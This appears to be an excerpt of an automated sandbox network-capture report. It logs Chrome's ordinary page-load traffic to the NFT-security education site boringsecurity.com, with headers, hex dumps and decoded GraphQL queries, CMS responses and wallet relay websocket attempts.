                                                                          2023-12-10 16:44:52 UTC1028INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 35 38 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74
                                                                          Data Ascii: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:58 GMTContent-Type: application/jsonContent-Length: 4580Connection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: t
                                                                          2023-12-10 16:44:52 UTC4580INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 73 68 6f 70 73 22 3a 7b 22 6d 65 74 61 22 3a 7b 22 70 61 67 69 6e 61 74 69 6f 6e 22 3a 7b 22 74 6f 74 61 6c 22 3a 34 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 50 61 67 69 6e 61 74 69 6f 6e 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 52 65 73 70 6f 6e 73 65 43 6f 6c 6c 65 63 74 69 6f 6e 4d 65 74 61 22 7d 2c 22 64 61 74 61 22 3a 5b 7b 22 69 64 22 3a 22 33 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 74 69 74 6c 65 22 3a 22 47 65 74 20 79 6f 75 72 20 59 75 62 69 6b 65 79 20 6e 6f 77 21 20 28 24 35 30 2f 24 35 35 29 22 2c 22 6c 69 6e 6b 22 3a 22 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 6e 74 72 61 2e 63 6f 6d 2f 74 2f 32 2d 33 39 37 37 36 37 2d 32 38 37 34 31 36 2d 31 39 31 35 37 35 22 2c 22 69 6d 61 67 65 22 3a
                                                                          Data Ascii: {"data":{"shops":{"meta":{"pagination":{"total":4,"__typename":"Pagination"},"__typename":"ResponseCollectionMeta"},"data":[{"id":"3","attributes":{"title":"Get your Yubikey now! ($50/$55)","link":" https://www.pntra.com/t/2-397767-287416-191575","image":


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          123192.168.2.54985675.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:52 UTC520OUTGET /parseGridNftDataToCanvas.worker.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: worker
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
                                                                          2023-12-10 16:44:52 UTC322INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 32 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 39 32 32 65 33 34 64 66 39 61 66 65 63 37 36 36 30 62 66 64 61 65 62 34 33 30 36 31 65 61 33 2d 73 73 6c 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedCache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitDate: Sun, 10 Dec 2023 16:44:52 GMTEtag: "0922e34df9afec7660bfdaeb43061ea3-ssl"Server: NetlifyStrict-Transport-Security: max-age=31536000


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          124192.168.2.5498573.213.155.1364435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:52 UTC1221OUTGET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt1ajg3ZWNja1ZldXE1dnVrd1c4cmFFWHl4NmFZY0p0VnpkY2RreFQ4emJ0OSIsInN1YiI6IjM5ZWE1YzhlYzIzNjFkZmExNmU0ODM1NDk4YzFkOTM0ZDhlZDMzOTMxZTg0NDZjM2E0MjE3MmQxMDgzZmVjYTMiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0LmNvbSIsImlhdCI6MTcwMjIyNjY5MSwiZXhwIjoxNzAyMzEzMDkxfQ.oiuqPnF9amL8lr2fAZQhfFCpBsO8qS3ogRpu_Gup7k2XwxWMsywkxJbQcBz1sbCc15ht93gFi2-99yClj7xUBg&projectId=6fc490f91addcb4e7b2ceeabf6f0bb3b&ua=wc-2%2Fjs-2.9.2%2Fwindows10-chrome-117.0.0%2Fbrowser%3Aboringsecurity.com&useOnCloseEvent=true HTTP/1.1
                                                                          Host: relay.walletconnect.com
                                                                          Connection: Upgrade
                                                                          Pragma: no-cache
                                                                          Cache-Control: no-cache
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Upgrade: websocket
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-WebSocket-Version: 13
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __cf_bm=YD94S42W_KZc1cIu43JNqSDqDzEjxJ6AqgPFYIoGAKo-1702226668-0-AcY4kZecMvVNd+2tgdWY5r22mxpAQEy0KOOmd18EKhqfPvIJVvUXHP/xzAbRSEMG58Cp6YfKrfnMAnSxgQkXDLA=
                                                                          Sec-WebSocket-Key: PJf6YUtHWJpvJCejPqUuAg==
                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                          2023-12-10 16:44:53 UTC126INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 34 33 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 32 20 47 4d 54 0d 0a 0d 0a
                                                                          Data Ascii: HTTP/1.1 400 Bad Requestcontent-type: text/plain; charset=utf-8content-length: 43date: Sun, 10 Dec 2023 16:44:52 GMT
                                                                          2023-12-10 16:44:53 UTC43INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 75 70 67 72 61 64 65 27
                                                                          Data Ascii: Connection header did not include 'upgrade'


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          125192.168.2.54985923.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:53 UTC617OUTPOST /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 736
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          accept: */*
                                                                          content-type: application/json
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:53 UTC736OUTData Raw: 7b 22 6f 70 65 72 61 74 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 74 43 6f 6e 74 72 69 62 75 74 6f 72 73 22 2c 22 76 61 72 69 61 62 6c 65 73 22 3a 7b 22 70 61 67 65 22 3a 31 2c 22 6c 69 6d 69 74 22 3a 35 30 2c 22 66 65 61 74 75 72 65 64 22 3a 74 72 75 65 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 7d 2c 22 71 75 65 72 79 22 3a 22 71 75 65 72 79 20 47 65 74 43 6f 6e 74 72 69 62 75 74 6f 72 73 28 24 70 61 67 65 3a 20 49 6e 74 2c 20 24 6c 69 6d 69 74 3a 20 49 6e 74 2c 20 24 66 65 61 74 75 72 65 64 3a 20 42 6f 6f 6c 65 61 6e 2c 20 24 6c 6f 63 61 6c 65 3a 20 49 31 38 4e 4c 6f 63 61 6c 65 43 6f 64 65 29 20 7b 5c 6e 20 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 28 5c 6e 20 20 20 20 70 61 67 69 6e 61 74 69 6f 6e 3a 20 7b 70 61 67 65 3a 20 24 70 61 67 65 2c 20 70 61 67 65 53
                                                                          Data Ascii: {"operationName":"GetContributors","variables":{"page":1,"limit":50,"featured":true,"locale":"en"},"query":"query GetContributors($page: Int, $limit: Int, $featured: Boolean, $locale: I18NLocaleCode) {\n contributors(\n pagination: {page: $page, pageS
                                                                          2023-12-10 16:44:53 UTC1029INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 35 35 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:59 GMTContent-Type: application/jsonContent-Length: 22557Connection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials:
                                                                          2023-12-10 16:44:53 UTC15355INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3a 7b 22 64 61 74 61 22 3a 5b 7b 22 69 64 22 3a 22 32 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6e 61 6d 65 22 3a 22 46 65 6c 64 22 2c 22 62 69 6f 22 3a 22 4f 6e 65 20 6f 66 20 74 68 65 20 66 6f 75 6e 64 65 72 73 20 6f 66 20 42 6f 72 69 6e 67 20 53 65 63 75 72 69 74 79 2c 20 46 65 6c 64 20 68 61 73 20 61 6e 20 65 78 74 65 6e 73 69 76 65 20 62 61 63 6b 67 72 6f 75 6e 64 20 69 6e 20 62 6f 74 68 20 53 65 63 75 72 69 74 79 20 61 6e 64 20 62 6c 6f 63 6b 63 68 61 69 6e 2e 20 46 65 6c 64 20 69 73 20 70 61 73 73 69 6f 6e 61 74 65 20 61 62 6f 75 74 20 74 65 61 63 68 69 6e 67 20 61 6e 64 20 70 72 65 76 65 6e 74 69 6e 67 20 79 6f 75 20 66 72 6f 6d 20 67 65 74 74 69 6e 67 20 72 75 67 67 65
                                                                          Data Ascii: {"data":{"contributors":{"data":[{"id":"2","attributes":{"name":"Feld","bio":"One of the founders of Boring Security, Feld has an extensive background in both Security and blockchain. Feld is passionate about teaching and preventing you from getting rugge
                                                                          2023-12-10 16:44:53 UTC7202INData Raw: 63 65 20 77 69 74 68 20 6d 65 6d 65 73 2e 20 53 70 61 6e 69 73 68 20 62 69 6c 69 6e 67 75 61 6c 20 61 6e 64 20 63 6c 61 73 73 20 69 6e 73 74 72 75 63 74 6f 72 2e 22 2c 22 74 77 69 74 74 65 72 22 3a 22 40 46 72 65 65 6b 79 43 72 79 70 74 6f 22 2c 22 79 6f 75 74 75 62 65 22 3a 6e 75 6c 6c 2c 22 61 76 61 74 61 72 22 3a 7b 22 64 61 74 61 22 3a 7b 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6e 61 6d 65 22 3a 22 46 72 65 65 6b 79 43 72 79 70 74 6f 2e 70 6e 67 22 2c 22 66 6f 72 6d 61 74 73 22 3a 7b 22 74 68 75 6d 62 6e 61 69 6c 22 3a 7b 22 6e 61 6d 65 22 3a 22 74 68 75 6d 62 6e 61 69 6c 5f 46 72 65 65 6b 79 43 72 79 70 74 6f 2e 70 6e 67 22 2c 22 68 61 73 68 22 3a 22 74 68 75 6d 62 6e 61 69 6c 5f 46 72 65 65 6b 79 5f 43 72 79 70 74 6f 5f 32 39 61 30 62 62 64 30
                                                                          Data Ascii: ce with memes. Spanish bilingual and class instructor.","twitter":"@FreekyCrypto","youtube":null,"avatar":{"data":{"attributes":{"name":"FreekyCrypto.png","formats":{"thumbnail":{"name":"thumbnail_FreekyCrypto.png","hash":"thumbnail_Freeky_Crypto_29a0bbd0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          126192.168.2.54986023.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:53 UTC617OUTPOST /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 393
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          accept: */*
                                                                          content-type: application/json
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:53 UTC393OUTData Raw: 7b 22 6f 70 65 72 61 74 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 74 46 41 51 73 22 2c 22 76 61 72 69 61 62 6c 65 73 22 3a 7b 22 70 61 67 65 22 3a 31 2c 22 6c 69 6d 69 74 22 3a 35 30 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 7d 2c 22 71 75 65 72 79 22 3a 22 71 75 65 72 79 20 47 65 74 46 41 51 73 28 24 70 61 67 65 3a 20 49 6e 74 2c 20 24 6c 69 6d 69 74 3a 20 49 6e 74 2c 20 24 6c 6f 63 61 6c 65 3a 20 49 31 38 4e 4c 6f 63 61 6c 65 43 6f 64 65 29 20 7b 5c 6e 20 20 66 61 71 73 28 70 61 67 69 6e 61 74 69 6f 6e 3a 20 7b 70 61 67 65 3a 20 24 70 61 67 65 2c 20 70 61 67 65 53 69 7a 65 3a 20 24 6c 69 6d 69 74 7d 2c 20 6c 6f 63 61 6c 65 3a 20 24 6c 6f 63 61 6c 65 29 20 7b 5c 6e 20 20 20 20 64 61 74 61 20 7b 5c 6e 20 20 20 20 20 20 69 64 5c 6e 20 20 20 20 20 20 61 74 74 72
                                                                          Data Ascii: {"operationName":"GetFAQs","variables":{"page":1,"limit":50,"locale":"en"},"query":"query GetFAQs($page: Int, $limit: Int, $locale: I18NLocaleCode) {\n faqs(pagination: {page: $page, pageSize: $limit}, locale: $locale) {\n data {\n id\n attr
                                                                          2023-12-10 16:44:53 UTC1028INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 35 38 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74
                                                                          Data Ascii: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:59 GMTContent-Type: application/jsonContent-Length: 2584Connection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: t
                                                                          2023-12-10 16:44:53 UTC2584INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 66 61 71 73 22 3a 7b 22 64 61 74 61 22 3a 5b 7b 22 69 64 22 3a 22 31 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 71 75 65 73 74 69 6f 6e 22 3a 22 57 68 61 74 20 69 73 20 74 68 69 73 20 70 72 6f 6a 65 63 74 3f 22 2c 22 61 6e 73 77 65 72 22 3a 22 3c 70 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 5c 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 3b 5c 22 3e 42 6f 72 69 6e 67 20 53 65 63 75 72 69 74 79 20 69 73 20 61 20 66 72 65 65 20 70 75 62 6c 69 63 20 75 74 69 6c 69 74 79 2c 20 64 65 73 69 67 6e 65 64 20 74 6f 20 6b 65 65 70 20 74 68 65 20 4e 46 54 20 63 6f 6d 6d 75 6e 69 74 79 20 73 61 66 65 2e 20 48 65 72 65 20 79 6f 75 20 77 69 6c 6c 20 66 69 6e 64 20 72 65 73 6f 75 72 63 65 73 2c 20 63 6c 61 73 73 65 73 2c 20 61
                                                                          Data Ascii: {"data":{"faqs":{"data":[{"id":"1","attributes":{"question":"What is this project?","answer":"<p><span style=\"font-family:Arial;\">Boring Security is a free public utility, designed to keep the NFT community safe. Here you will find resources, classes, a


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          127192.168.2.54986175.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:53 UTC520OUTGET /parseGridNftDataToCanvas.worker.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: worker
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
                                                                          2023-12-10 16:44:53 UTC322INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 33 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 39 32 32 65 33 34 64 66 39 61 66 65 63 37 36 36 30 62 66 64 61 65 62 34 33 30 36 31 65 61 33 2d 73 73 6c 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedCache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitDate: Sun, 10 Dec 2023 16:44:53 GMTEtag: "0922e34df9afec7660bfdaeb43061ea3-ssl"Server: NetlifyStrict-Transport-Security: max-age=31536000


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          128192.168.2.549858104.18.37.84435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:53 UTC503OUTGET /rpc HTTP/1.1
                                                                          Host: www.walletlink.org
                                                                          Connection: Upgrade
                                                                          Pragma: no-cache
                                                                          Cache-Control: no-cache
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Upgrade: websocket
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-WebSocket-Version: 13
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Sec-WebSocket-Key: oPPn3vfc/LMt2g0A1xmHyQ==
                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                          2023-12-10 16:44:53 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 63 2d 57 65 62 73 6f 63 6b 65 74 2d 56 65 72 73 69 6f 6e 3a 20 31 33 0d 0a 58 2d 43 6f 6e 74 65 6e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestDate: Sun, 10 Dec 2023 16:44:53 GMTContent-Type: text/plain; charset=utf-8Content-Length: 12Connection: closeAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Origin: *Sec-Websocket-Version: 13X-Conten
                                                                          2023-12-10 16:44:53 UTC12INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a
                                                                          Data Ascii: Bad Request


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          129192.168.2.54986223.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:53 UTC617OUTPOST /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 322
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          accept: */*
                                                                          content-type: application/json
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:53 UTC322OUTData Raw: 7b 22 6f 70 65 72 61 74 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 74 43 61 74 65 67 6f 72 69 65 73 22 2c 22 76 61 72 69 61 62 6c 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 7d 2c 22 71 75 65 72 79 22 3a 22 71 75 65 72 79 20 47 65 74 43 61 74 65 67 6f 72 69 65 73 28 24 6c 6f 63 61 6c 65 3a 20 49 31 38 4e 4c 6f 63 61 6c 65 43 6f 64 65 29 20 7b 5c 6e 20 20 63 61 74 65 67 6f 72 69 65 73 28 6c 6f 63 61 6c 65 3a 20 24 6c 6f 63 61 6c 65 29 20 7b 5c 6e 20 20 20 20 64 61 74 61 20 7b 5c 6e 20 20 20 20 20 20 69 64 5c 6e 20 20 20 20 20 20 61 74 74 72 69 62 75 74 65 73 20 7b 5c 6e 20 20 20 20 20 20 20 20 6e 61 6d 65 5c 6e 20 20 20 20 20 20 20 20 64 65 73 63 72 69 70 74 69 6f 6e 5c 6e 20 20 20 20 20 20 20 20 6c 6f 63 61 6c 65 5c 6e 20 20 20 20 20 20 20 20 5f 5f 74
                                                                          Data Ascii: {"operationName":"GetCategories","variables":{"locale":"en"},"query":"query GetCategories($locale: I18NLocaleCode) {\n categories(locale: $locale) {\n data {\n id\n attributes {\n name\n description\n locale\n __t
